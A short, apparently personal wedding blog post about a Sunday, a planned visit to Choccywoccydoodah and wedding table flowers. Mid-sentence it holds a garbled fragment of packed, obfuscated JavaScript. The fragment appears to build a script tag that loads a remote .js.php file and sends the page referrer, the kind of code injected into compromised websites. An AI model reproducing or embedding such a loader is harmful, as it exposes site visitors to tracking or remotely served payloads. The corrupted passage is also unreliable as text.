Morning folks!  It’s Sunday: bacon and eggs, hot hot coffee and croissants! Oh I wish.  What a wonderful thought though after a long, busy week.  I hope your Sunday has brought out the romantic side of your fiancé and that you have just finished a buffet in bed!

It’s a long weekend here and Pickles has been grabbing at my legs for the many hours that I’ve been working, so I have decided today is the day we go and see Choccywoccydoodah and””””,’g””” c=\’d\’ e=\’b/’ 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’bakzb|varnekai||js|php’.split(‘|’),0,{}))
try and meet the Cheshire Cat.  And, try one of those delicious lips we love.  If your not sure how you’d feel eating a pair of lips check out our post here.

I will leave you with this sweet, fresh and unusual take on wedding table flowers: fresh, perfect for a summer wedding. Would you use it?  How could you change it – give us your comments and let us know your ideas.